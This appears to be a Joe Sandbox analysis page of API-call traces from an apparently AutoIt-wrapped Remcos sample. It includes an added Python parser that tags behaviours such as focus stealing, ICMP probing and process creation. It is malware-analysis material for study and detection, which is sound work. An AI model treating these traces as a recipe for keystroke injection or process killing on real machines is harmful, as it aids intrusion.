                    • Opcode ID: 5e66977591041c3dab197aaec66e49b9e56461707029e72b66bb97b30796a9c1
                    • Instruction ID: 3ee76afa0ca84637266ec45e731780132dfd178ba1be44a43da7e6bff9765aca
                    • Opcode Fuzzy Hash: 5e66977591041c3dab197aaec66e49b9e56461707029e72b66bb97b30796a9c1
                    • Instruction Fuzzy Hash: 5A113A76248357BAFA012621EC1FFAAB79CDF11324F20002EF910A44E1FF715A419568
                    APIs
                    • __swprintf.LIBCMT ref: 00CD419D
                    • __swprintf.LIBCMT ref: 00CD41AA
                      • Part of subcall function 00C938D8: __woutput_l.LIBCMT ref: 00C93931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CD41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 00CD41E0
                    • LockResource.KERNEL32(00000000), ref: 00CD41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00CD420D
                    • LoadResource.KERNEL32(?,00000000), ref: 00CD421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 00CD422E
                    • LockResource.KERNEL32(?), ref: 00CD423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CD429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 1fa3e48491dae30e6f95654936b5fbc45a7b6e41c1d715a16f2d544185618884
                    • Instruction ID: 67ea1bd54020e433a859a57cfba01035c41364cbfae978be7ac924a201c8e0ff
                    • Opcode Fuzzy Hash: 1fa3e48491dae30e6f95654936b5fbc45a7b6e41c1d715a16f2d544185618884
                    • Instruction Fuzzy Hash: 5E31AEB160121AABDB199F60DC88BBF7BACEF04301F00452AFA11D2250D770DA52CBB1
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00CD1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 00CD171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD17CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: e3e1ec2ff99f1cae3cd45163ccd88d39583b0e795d00658be4c64c62b3de35a4
                    • Instruction ID: 3855d81e7e7712b59db0a2105b0dbd5f509871acb58f2b19e745761c9e4b5280
                    • Opcode Fuzzy Hash: e3e1ec2ff99f1cae3cd45163ccd88d39583b0e795d00658be4c64c62b3de35a4
                    • Instruction Fuzzy Hash: A8317CB5604704BBEB219F14DC84B7D7BAAEF55711F16402AFE14CA3A0DB749E80CB61
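The entries above are raw Joe Sandbox IDA-plugin output: one function per block, its imported API calls with argument snapshots and return addresses, then the API ID / String ID fingerprints used for similarity. When triaging a report like this it helps to pull the blocks into structured records and tag the few call patterns that matter, here the AttachThreadInput-to-foreground-thread sequence (input-queue attach used to steal focus), the ICMP echo helper paired with the "Ping" string, the INVALID/NOTREADY/READY/READONLY/UNKNOWN status words (the return values of AutoIt's DriveStatus(), consistent with the compiled-AutoIt verdict in the report header), and CreateProcessW. The parser below is an added example, not Joe Sandbox or AutoIt code; SAMPLE is a constructed excerpt copied in the report's own layout, and the tag names are labels chosen here, not report signatures.

```python
"""Parse Joe Sandbox IDA-plugin function entries into records and tag call patterns.

Added example for this report page, not Joe Sandbox tooling. SAMPLE is a
constructed excerpt in the report's own layout; the tag names are ours.
"""
import re
from collections import Counter

SAMPLE = """\
APIs
• WSAStartup.WS2_32(00000101,?), ref: 00CE5AA6
• gethostbyname.WS2_32(?), ref: 00CE5AF7
• IcmpCreateFile.IPHLPAPI ref: 00CE5B05
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE5B75
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: f85f7ed8b66726c8530b4693f83a9efa49469d768dffdd39f6ecc5267002d5e7
APIs
• GetCurrentThreadId.KERNEL32 ref: 00CD1700
• GetForegroundWindow.USER32(00000000,?), ref: 00CD1714
• GetWindowThreadProcessId.USER32(00000000), ref: 00CD171B
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00CD172A
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00CD17CC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• Opcode ID: e3e1ec2ff99f1cae3cd45163ccd88d39583b0e795d00658be4c64c62b3de35a4
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00CDB73B
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CDB7B1
• SetErrorMode.KERNEL32(00000000,READY), ref: 00CDB828
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• Opcode ID: 09d67f7efec79ea09e7260eb3bec2ccbfd08c1f7018decf3647c5791e3f356a5
"""

# One API line: optional "Part of subcall function X:" prefix, then api.MODULE,
# optional "(args)", then "ref: <return address>".
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function [0-9A-F]+:\s+)?"
    r"(?P<api>[^.\s]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$"
)

# Similarity fields we keep; "• API String ID:" deliberately matches none of these.
FIELDS = {"• API ID:": "api_id", "• String ID:": "string_id", "• Opcode ID:": "opcode_id"}


def parse_entries(text):
    """Split report text into per-function dicts: apis=[(api, module, args, ref)], ids."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # every function block starts here
            cur = {"apis": [], "api_id": "", "string_id": "", "opcode_id": ""}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur["apis"].append((m["api"], m["mod"], m["args"] or "", m["ref"]))
            continue
        for label, key in FIELDS.items():
            if line.startswith(label):
                cur[key] = line[len(label):].strip()   # may be empty ("• String ID:")
                break
    return entries


def tag_entry(entry):
    """Label call patterns worth a second look; the tag names are our own."""
    names = {api for api, _, _, _ in entry["apis"]}
    strings = set(entry["string_id"].split("$")) if entry["string_id"] else set()
    tags = []
    if {"GetForegroundWindow", "AttachThreadInput"} <= names:
        tags.append("focus-steal")      # attaches to the foreground window's input queue
    if "IcmpSendEcho" in names:
        tags.append("icmp-probe")       # ICMP echo through IPHLPAPI, no socket needed
    if {"INVALID", "NOTREADY", "READONLY", "READY", "UNKNOWN"} <= strings:
        tags.append("drive-status")     # status words returned by AutoIt's DriveStatus()
    if "CreateProcessW" in names:
        tags.append("process-create")
    return tags


def module_histogram(entries):
    """Count imported-API calls per module across all parsed functions."""
    return Counter(mod for e in entries for _, mod, _, _ in e["apis"])


def triage(text):
    """Return (opcode-id prefix, string id, tags) for every entry that got a tag."""
    rows = []
    for e in parse_entries(text):
        tags = tag_entry(e)
        if tags:
            rows.append((e["opcode_id"][:12], e["string_id"], tags))
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
    print(module_histogram(parse_entries(SAMPLE)))
```

Feed the whole report text to triage() instead of SAMPLE to get the tagged subset of all several hundred entries; the opcode-ID prefix is enough to jump back to the matching block, and the module histogram is a quick sanity check that the dump is mostly AutoIt runtime (USER32/GDI32/LIBCMT heavy) rather than the injected Remcos payload.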
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C7FC06
                    • OleUninitialize.OLE32(?,00000000), ref: 00C7FCA5
                    • UnregisterHotKey.USER32(?), ref: 00C7FDFC
                    • DestroyWindow.USER32(?), ref: 00CB4A00
                    • FreeLibrary.KERNEL32(?), ref: 00CB4A65
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CB4A92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: 9574ed7cae849eb7de63b0ba5d3376007d5a5cb56018016c332c3982ffa225ff
                    • Instruction ID: 4992f3c49249b79e48d7f825349331cc7d977701745f4ed9f40df0ec486f6207
                    • Opcode Fuzzy Hash: 9574ed7cae849eb7de63b0ba5d3376007d5a5cb56018016c332c3982ffa225ff
                    • Instruction Fuzzy Hash: A7A15A30705212CFCB29EF14C495B69F7A4EF04710F1482ADE91AAB262DB30AE17EF54
                    APIs
                    • EnumChildWindows.USER32(?,00CCAA64), ref: 00CCA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: dce46eae059f295eae4cc06926186a3eb7c56246fee615f3edd8a3e0b7a38580
                    • Instruction ID: db0599008063632eaf375155b753864bc2862f7c4f7a0af76ccd0ab465f5bd47
                    • Opcode Fuzzy Hash: dce46eae059f295eae4cc06926186a3eb7c56246fee615f3edd8a3e0b7a38580
                    • Instruction Fuzzy Hash: 2B918631A0054A9BDF18DF60C48AFE9FB74BF04318F50811DD59AA7251DF306A99DBA1
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00C72EAE
                      • Part of subcall function 00C71DB3: GetClientRect.USER32(?,?), ref: 00C71DDC
                      • Part of subcall function 00C71DB3: GetWindowRect.USER32(?,?), ref: 00C71E1D
                      • Part of subcall function 00C71DB3: ScreenToClient.USER32(?,?), ref: 00C71E45
                    • GetDC.USER32 ref: 00CACF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CACF95
                    • SelectObject.GDI32(00000000,00000000), ref: 00CACFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 00CACFB8
                    • ReleaseDC.USER32(?,00000000), ref: 00CACFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CAD04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    APIs
                    • _memset.LIBCMT ref: 00CEF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CEFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CEFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CEFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CEFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CEFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CEFD90
                    • CloseHandle.KERNEL32(?), ref: 00CEFDBF
                    • CloseHandle.KERNEL32(?), ref: 00CEFE36
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    APIs
                      • Part of subcall function 00C71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C72036,?,00000000,?,?,?,?,00C716CB,00000000,?), ref: 00C71B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C720D3
                    • KillTimer.USER32(-00000001,?,?,?,?,00C716CB,00000000,?,?,00C71AE2,?,?), ref: 00C7216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00CABEF6
                    • DeleteObject.GDI32(00000000), ref: 00CABF6C
                    Similarity
                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 2402799130-0
                    APIs
                      • Part of subcall function 00CD48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD38D3,?), ref: 00CD48C7
                      • Part of subcall function 00CD48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CD38D3,?), ref: 00CD48E0
                      • Part of subcall function 00CD4CD3: GetFileAttributesW.KERNEL32(?,00CD3947), ref: 00CD4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 00CD4FE2
                    • _wcscmp.LIBCMT ref: 00CD4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 00CD5017
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CF896E
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00CAC547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CAC569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CAC581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00CAC59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CAC5C0
                    • DestroyCursor.USER32(00000000), ref: 00CAC5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CAC5EC
                    • DestroyCursor.USER32(?), ref: 00CAC5FB
                      • Part of subcall function 00CFA71E: DeleteObject.GDI32(00000000), ref: 00CFA757
                    Similarity
                    • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2975913752-0
                    APIs
                      • Part of subcall function 00CCAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCAE77
                      • Part of subcall function 00CCAE57: GetCurrentThreadId.KERNEL32 ref: 00CCAE7E
                      • Part of subcall function 00CCAE57: AttachThreadInput.USER32(00000000,?,00CC9B65,?,00000001), ref: 00CCAE85
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CC9B70
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CC9B8D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00CC9B90
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CC9B99
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CC9BB7
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CC9BBA
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CC9BC3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CC9BDA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CC9BDD
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E0C
                    • RtlAllocateHeap.NTDLL(00000000,?,00CC8A84), ref: 00CC8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CC8A84,00000B00,?,?), ref: 00CC8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E30
                    • DuplicateHandle.KERNEL32(00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00CC8A84,00000B00,?,?), ref: 00CC8E43
                    • GetCurrentProcess.KERNEL32(00CC8A84,00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,00CC8A84,00000B00,?,?), ref: 00CC8E4E
                    • CreateThread.KERNEL32(00000000,00000000,00CC8E74,00000000,00000000,00000000), ref: 00CC8E68
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                    • String ID:
                    • API String ID: 1422014791-0
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-625585964
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CF7093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CF70A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CF70C1
                    • _wcscat.LIBCMT ref: 00CF711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CF7133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CF7161
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    APIs
                      • Part of subcall function 00CD3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00CD3EB6
                      • Part of subcall function 00CD3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00CD3EC4
                      • Part of subcall function 00CD3E91: CloseHandle.KERNEL32(00000000), ref: 00CD3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CEECB8
                    • GetLastError.KERNEL32 ref: 00CEECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CEECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CEED77
                    • GetLastError.KERNEL32(00000000), ref: 00CEED82
                    • CloseHandle.KERNEL32(00000000), ref: 00CEEDB7
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00CD32C5
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00CE8BEC
                    • CoInitialize.OLE32(00000000), ref: 00CE8C19
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00CE8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CE8E50
                    • CoGetObject.OLE32(?,00000000,00D02C0C,?), ref: 00CE8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 00CE8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CE8F3A
                    • VariantClear.OLEAUT32(?), ref: 00CE8F4A
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                    • String ID:
                    • API String ID: 2437601815-0
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CD454E
                    • LoadStringW.USER32(00000000), ref: 00CD4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CD456B
                    • LoadStringW.USER32(00000000), ref: 00CD4572
                    • _wprintf.LIBCMT ref: 00CD4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00CD4593
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00CAC417,00000004,00000000,00000000,00000000), ref: 00C72ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00CAC417,00000004,00000000,00000000,00000000,000000FF), ref: 00C72B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00CAC417,00000004,00000000,00000000,00000000), ref: 00CAC46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00CAC417,00000004,00000000,00000000,00000000), ref: 00CAC4D6
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 10d46f0d023028d5d825fa01fc540a3af15d0491cbe2308449da07475643321d
                    • Instruction ID: 3b602f47481e76627713ca807345de5d746c71ec6c3bc61e3419c7b0fa1740e3
                    • Instruction Fuzzy Hash: EF414830608781ABC7358B29CCD9B7A7B96EF4A324F28C81DF06F86560C6759982F711
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CD737F
                      • Part of subcall function 00C90FF6: std::exception::exception.LIBCMT ref: 00C9102C
                      • Part of subcall function 00C90FF6: __CxxThrowException@8.LIBCMT ref: 00C91041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CD73B6
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00CD73D2
                    • _memmove.LIBCMT ref: 00CD7420
                    • _memmove.LIBCMT ref: 00CD743D
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00CD744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CD7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CD7480
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: a29ecd2b89c80878062bd8d99de2c2a4656be6c14031516a21cac32b890cd570
                    • Instruction ID: b3b96d9eee9475c35979a207d687bf3b94340484be072732de6a384b6719b1b8
                    • Instruction Fuzzy Hash: D3318131904205EBCF10DF54DC89AAE7B78EF44710B1441BAFE04AB256DB319A11DBA1
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00CF645A
                    • GetDC.USER32(00000000), ref: 00CF6462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 00CF6479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CF64B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CF64C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CF9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00CF6500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CF6520
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 6c09c017949071a48f530218aff6233c4ffb8e572b04e2d61aff70dc46924ee1
                    • Instruction ID: 7f4881109cde45fda46cdbaaf09a9e3174c7a552497924f1c5d612a09c78e3a8
                    • Instruction Fuzzy Hash: 14316F72101214BFEB118F50CC89FFA3FA9EF09761F044069FE08EA195D6759D42CB65
                    APIs
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 73025fb56e55d634e2e7984741e4999d8e424325852cdbb553c2f86fb4262bed
                    • Instruction ID: a77f8246ada72176a6ad78a5d84da363b065db4c2a700b6a5d3f552faa7b6e5f
                    • Instruction Fuzzy Hash: 0E216872A41206BBE615A522DDCBFBF239CDF20394B0C4019FE1D96282E751DE1591B5
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • CoInitialize.OLE32(00000000), ref: 00CDD855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CDD8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 00CDD8FC
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CDD9B7
                    • _memset.LIBCMT ref: 00CDDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 00CDDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CDDAAB
                    Similarity
                    • API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
                    • String ID:
                    • API String ID: 3008154123-0
                    • Opcode ID: c5c73f820547fa24b4f46dd5804a1afa42d0aa796a0bfd3fc6b0ea6963602a5b
                    • Instruction ID: 2d34b8ce7c702d2a8d810cece556673ba2aaae3b58ac8897b36fc8cb4a564fa8
                    • Instruction Fuzzy Hash: 35B1EC75A00109AFDB14DFA4C888EAEBBB9FF48314B148469F50AEB351DB30EE45DB51
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ce89a020b6375e3fb0992e5918fcab1a14443de532ed8d044145a64c73077bf
                    • Instruction ID: 8dac9620f71dd9bdcd98ee9414037ab9c3f81da36d78f20efb4f94f06e10010d
                    • Instruction Fuzzy Hash: BE716D30900109EFDB14DF99CC49EBEBBB9FF86314F18C159F919AA251C734AA51DBA0
                    APIs
                    • IsWindow.USER32(00882760), ref: 00CFB6A5
